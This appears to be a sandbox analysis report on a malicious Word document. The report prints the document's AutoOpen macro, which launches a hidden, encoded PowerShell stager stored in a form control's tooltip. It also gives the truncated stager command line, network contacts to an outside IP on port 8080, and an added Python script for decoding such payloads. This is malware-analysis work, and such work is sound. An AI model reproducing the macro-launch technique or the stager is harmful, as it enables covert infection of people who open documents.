        VBA File Name: CatchMeIfYouCan.frm, Stream Size: 1473
        General
        Stream Path:Macros/VBA/CatchMeIfYouCan
        VBA File Name:CatchMeIfYouCan.frm
        Stream Size:1473
        Data ASCII:. . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . e y _ q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 01 f0 00 00 00 d0 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff d7 03 00 00 9f 04 00 00 00 00 00 00 01 00 00 00 65 79 5f 71 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "CatchMeIfYouCan"
        Attribute VB_Base = "0{1EFEF94B-5D68-499E-896C-2EF23F0DFA0F}{91AFCBA1-38EA-4EEC-AA4D-8812B8EABB58}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = False
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = False
        Private Sub SquidGame_Click()
        
        End Sub
        
        Private Sub CatchMeIfYouCan_Click()
        
        End Sub
        VBA File Name: Module1.bas, Stream Size: 994
        General
        Stream Path:Macros/VBA/Module1
        VBA File Name:Module1.bas
        Stream Size:994
        Data ASCII:. . . . . . . . . \\ . . . . . . . . . . . . . . . c . . . 3 . . . . . . . . . . . e y . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 00 f0 00 00 00 5c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 63 02 00 00 33 03 00 00 00 00 00 00 01 00 00 00 65 79 e6 24 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "Module1"
        Sub AutoOpen()
            Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
        End Sub
        VBA File Name: ThisDocument.cls, Stream Size: 924
        General
        Stream Path:Macros/VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:924
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e y . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 00 f0 00 00 00 9e 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff a5 02 00 00 f9 02 00 00 00 00 00 00 01 00 00 00 65 79 11 5b 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "ThisDocument"
        Attribute VB_Base = "1Normal.ThisDocument"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = True
        Attribute VB_Customizable = True

        Streams

        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
        General
        Stream Path:\x1CompObj
        File Type:data
        Stream Size:114
        Entropy:4.2359563651
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5DocumentSummaryInformation
        File Type:data
        Stream Size:4096
        Entropy:0.234884867794
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5SummaryInformation
        File Type:data
        Stream Size:4096
        Entropy:0.491445346068
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s a l e s . . . . . . . . . . . . . . . . . . . . . . . N o r m
        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 07 00 00 00 c4 00 00 00 08 00 00 00 d4 00 00 00 09 00 00 00 fc 00 00 00 12 00 00 00 08 01 00 00
        Stream Path: 1Table, File Type: data, Stream Size: 7157
        General
        Stream Path:1Table
        File Type:data
        Stream Size:7157
        Entropy:5.87317540429
        Base64 Encoded:True
        Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
        Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
        Stream Path: Macros/CatchMeIfYouCan/\x1CompObj, File Type: data, Stream Size: 97
        General
        Stream Path:Macros/CatchMeIfYouCan/\x1CompObj
        File Type:data
        Stream Size:97
        Entropy:3.61064918306
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: Macros/CatchMeIfYouCan/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 313
        General
        Stream Path:Macros/CatchMeIfYouCan/\x3VBFrame
        File Type:ASCII text, with CRLF line terminators
        Stream Size:313
        Entropy:4.72397690372
        Base64 Encoded:True
        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } C a t c h M e I f Y o u C a n . . C a p t i o n = " C o b a l t S t r i k e I s E v e r y w h e r e " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i
        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 43 61 74 63 68 4d 65 49 66 59 6f 75 43 61 6e 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 43 6f 62 61 6c 74 53 74 72 69 6b 65 49 73 45 76 65 72 79 77 68 65 72 65 22 0d 0a
        Stream Path: Macros/CatchMeIfYouCan/f, File Type: data, Stream Size: 7566
        General
        Stream Path:Macros/CatchMeIfYouCan/f
        File Type:data
        Stream Size:7566
        Entropy:4.47380437593
        Base64 Encoded:False
        Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . L . . . . . h o . . D . . . . . . . . . . . . . T . . . . . . . . . . . S q u i d G a m e . i . . . . . . . . . J A B z A D 0 A T g B l A H c A L Q B P A G I A a g B l A G M A d A A g A E k A T w A u A E 0 A Z Q B t A G 8 A c g B 5 A F M A d A B y A G U A Y Q B t A C g A L A B b A E M A b w B u A H Y A Z Q B y A H Q A X Q A 6 A D o A R g B y A G 8 A b Q B C A G E A c w B l A D Y A N A B T A H Q A c g B p A G 4 A Z w
        Data Raw:00 04 24 00 48 0c 00 0c 01 00 00 00 04 40 00 00 02 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 4c 1d 00 00 00 01 68 6f 00 00 44 1d e5 09 00 00 09 00 00 80 01 00 00 00 54 00 00 00 00 00 1a 00 18 1d 00 80 53 71 75 69 64 47 61 6d 65 00 69 00 b1 fc ff ff a7 01 00 00 4a 41 42 7a 41 44 30 41 54 67 42 6c 41 48 63 41 4c 51 42 50 41 47 49 41 61 67
        Stream Path: Macros/CatchMeIfYouCan/o, File Type: data, Stream Size: 84
        General
        Stream Path:Macros/CatchMeIfYouCan/o
        File Type:data
        Stream Size:84
        Entropy:3.52158187156
        Base64 Encoded:False
        Data ASCII:. . 4 . F . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . 0 . . . C h e c k B o x 1 . i . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . .
        Data Raw:00 02 34 00 46 01 c0 80 00 00 00 00 0f 00 00 80 12 00 00 80 04 00 00 00 01 00 00 80 09 00 00 80 53 16 00 00 fc 0e 00 00 30 00 2e 00 43 68 65 63 6b 42 6f 78 31 00 69 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 00 02 00 00 54 61 68 6f 6d 61 00 00
        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 557
        General
        Stream Path:Macros/PROJECT
        File Type:ASCII text, with CRLF line terminators
        Stream Size:557
        Entropy:5.40366078681
        Base64 Encoded:True
        Data ASCII:I D = " { A 8 A 9 9 B 2 1 - 8 6 A 6 - 4 F 4 4 - 9 0 4 F - 5 A 4 A 5 C E 1 B 7 8 4 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = C a t c h M e I f Y o u C a n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 5 C 7 2 0 9 B 6 0 D 6 6
        Data Raw:49 44 3d 22 7b 41 38 41 39 39 42 32 31 2d 38 36 41 36 2d 34 46 34 34 2d 39 30 34 46 2d 35 41 34 41 35 43 45 31 42 37 38 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d
        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 113
        General
        Stream Path:Macros/PROJECTwm
        File Type:data
        Stream Size:113
        Entropy:3.53112839297
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . C a t c h M e I f Y o u C a n . C . a . t . c . h . M . e . I . f . Y . o . u . C . a . n . . . . .
        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 43 61 74 63 68 4d 65 49 66 59 6f 75 43 61 6e 00 43 00 61 00 74 00 63 00 68 00 4d 00 65 00 49 00 66 00 59 00 6f 00 75 00 43 00 61 00 6e 00 00 00 00 00
        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3394
        General
        Stream Path:Macros/VBA/_VBA_PROJECT
        File Type:data
        Stream Size:3394
        Entropy:4.19629379536
        Base64 Encoded:False
        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
        Data Raw:cc 61 b2 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 889
        General
        Stream Path:Macros/VBA/dir
        File Type:data
        Stream Size:889
        Entropy:6.52837099171
        Base64 Encoded:True
        Data ASCII:. u . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . m . x c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . & . . b .
        Data Raw:01 75 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 6d 00 78 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
        Stream Path: WordDocument, File Type: data, Stream Size: 4096
        General
        Stream Path:WordDocument
        File Type:data
        Stream Size:4096
        Entropy:0.997259699674
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j b 3 b 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . g . Y . g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:ec a5 c1 00 1f 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 01 08 00 00 0e 00 62 6a 62 6a 62 33 62 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 00 59 e8 67 00 59 e8 67 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
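The macro chain above is worth unwrapping by hand: the Module1 AutoOpen macro passes CatchMeIfYouCan.SquidGame.ControlTipText to powershell -encodedcommand, and the form's Macros/CatchMeIfYouCan/f stream shows the control name SquidGame followed by a long ASCII base64 run beginning JABzAD0A..., so the payload lives in a UserForm property and never appears in the VBA source. The -encodedcommand value is base64 over UTF-16LE; the opening shown in this report decodes to $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sI..., and H4sI is the base64 form of the gzip magic 1f 8b, the usual shape of a gzip-wrapped PowerShell stager. The following is an added triage script, not code from the report or from the sample: it harvests base64 runs from a raw form stream, peels the UTF-16LE layer, pulls the inner FromBase64String blob and gunzips it. The blob on this page is truncated, so only its first 48 base64 groups are used here (PAGE_PREFIX); the form stream and stage used for the full round trip are constructed stand-ins, and their layout and contents are assumptions.

```python
"""Unwrap a Word-macro PowerShell stager: -encodedcommand (base64/UTF-16LE) -> inner
FromBase64String blob -> gzip -> stage script.  Standard library only."""
from __future__ import annotations

import base64
import gzip
import re

# First 48 base64 groups of the -encodedcommand value printed in this report.  The value
# on the page is cut off, so only the opening of the script can be recovered from it.
PAGE_PREFIX = (
    "JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA"
    "LABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA"
    "SAA0AHMASQBBAEEAQQBBAEEAQQBBAEEA"
)


def decode_encoded_command(b64: str) -> str:
    """powershell -encodedcommand takes base64 over the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")


INNER_BLOB = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')


def unwrap_stager(encoded_cmd: str) -> dict:
    """Peel the outer encoding, then the inner base64 blob the script would gunzip and IEX."""
    script = decode_encoded_command(encoded_cmd)
    result = {"script": script, "inner_blob": None, "is_gzip": False, "stage": None}
    m = INNER_BLOB.search(script)
    if m is None:                      # truncated or differently built script
        return result
    blob = base64.b64decode(m.group(1))
    result["inner_blob"] = blob
    result["is_gzip"] = blob[:2] == b"\x1f\x8b"   # gzip magic, "H4sI" once base64-encoded
    if result["is_gzip"]:
        result["stage"] = gzip.decompress(blob).decode("utf-8", "replace")
    return result


# --- form-stream side: the payload sits in a control property, not in VBA source -------
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def harvest_form_stream(stream: bytes) -> list[str]:
    """Return long base64 runs from a raw UserForm 'f' stream (stored as ASCII here)."""
    return [run.decode("ascii") for run in B64_RUN.findall(stream)]


def triage(stream: bytes) -> list[dict]:
    """Unwrap every candidate payload found in a form stream."""
    return [unwrap_stager(run) for run in harvest_form_stream(stream)]


# --- constructed sample (assumption): the real stage is not recoverable from the page ---
STAGE_PLACEHOLDER = "Write-Host 'stage placeholder (constructed)'"


def build_sample_encoded_command(stage: str) -> str:
    """Rebuild an -encodedcommand value with the same shape as the one in the report."""
    inner = base64.b64encode(gzip.compress(stage.encode())).decode()
    script = (
        '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("' + inner + '"));'
        'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream('
        '$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'
    )
    return base64.b64encode(script.encode("utf-16-le")).decode()


def build_sample_form_stream(encoded_cmd: str) -> bytes:
    """Constructed bytes mimicking the layout seen in Macros/CatchMeIfYouCan/f:
    binary header, control name, then the property string in ASCII."""
    return (b"\x00\x04$\x00H\x0c" + b"\x00" * 24 + b"SquidGame\x00i\x00"
            + encoded_cmd.encode("ascii") + b"\x00" * 16)


if __name__ == "__main__":
    print(decode_encoded_command(PAGE_PREFIX))
    sample = build_sample_form_stream(build_sample_encoded_command(STAGE_PLACEHOLDER))
    for r in triage(sample):
        print("gzip:", r["is_gzip"], "| stage:", r["stage"])
```

On a real sample, feed harvest_form_stream the bytes of the form's f stream extracted with any OLE reader; the regex deliberately ignores short runs so control names and font strings do not trip it. The gzip check is a cheap discriminator: a stager whose inner blob does not start with 1f 8b is using a different wrapper and unwrap_stager leaves the stage empty rather than guessing.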

        Network Behavior

        Network Port Distribution

        TCP Packets

        Timestamp                            Source Port  Dest Port  Source IP       Dest IP
        Nov 15, 2021 19:27:52.864898920 CET  49165        8080       192.168.2.22    176.103.56.89
        Nov 15, 2021 19:27:52.916496992 CET  8080         49165      176.103.56.89   192.168.2.22
        Nov 15, 2021 19:27:53.421241045 CET  49165        8080       192.168.2.22    176.103.56.89
        Nov 15, 2021 19:27:53.474045038 CET  8080         49165      176.103.56.89   192.168.2.22
        Nov 15, 2021 19:27:53.982858896 CET  49165        8080       192.168.2.22    176.103.56.89
        Nov 15, 2021 19:27:54.035299063 CET  8080         49165      176.103.56.89   192.168.2.22

        Code Manipulations

        Statistics

        CPU Usage

        Memory Usage

        High Level Behavior Distribution

        Behavior

        System Behavior

        General

        Start time:19:28:12
        Start date:15/11/2021
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fc50000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:19:28:16
        Start date:15/11/2021
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUA